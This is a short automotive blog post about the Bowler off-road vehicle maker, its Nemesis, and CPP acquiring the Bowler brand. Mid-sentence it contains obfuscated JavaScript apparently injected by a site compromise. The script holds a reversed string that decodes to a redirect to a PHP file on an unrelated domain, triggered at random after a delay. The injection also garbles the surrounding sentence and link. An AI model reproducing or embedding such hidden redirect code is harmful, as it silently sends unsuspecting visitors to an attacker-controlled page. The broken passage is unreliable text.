Many of you will know Bowler, but I’m sure not many of you will know just how small the company was, or where it’s beginnings stem from. Drew Bowler was a blacksmith by trade and his company carved themselves a very strong niche as a group of nutcases that that took $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}androver.me” target=”_blank”>Land Rovers, manipulated them and sold them as turn-key monsters ready to handle the next jaunt to Dakar.  We had experienced the Nemisis for ourselves in the dunes of the UAE and can safely say that is a weapons grade machine and when you think a street legal version was on the cards, there was a lot of potential fun and customers to soak that fun up at the ready.

Sadly it seems as though either Mr Bowler is ready to call it a day and back away into a life of retirement and relaxed full fillment or the company is suffering a touch.  We say this as CPP, the UK-based coachbuilder that recently signed an MoU to buy Spyker, has just acquired the rights to the Bowler brand.

CPP has yet to announced its plans for the Bowler brand, but development and vehicle engineering will remain at Bowler’s Derbyshire location. Production of the Nemesis, including the upcoming road version called Nemesis EXR, will be dealt with at CPP’s main head office based in Coventry.
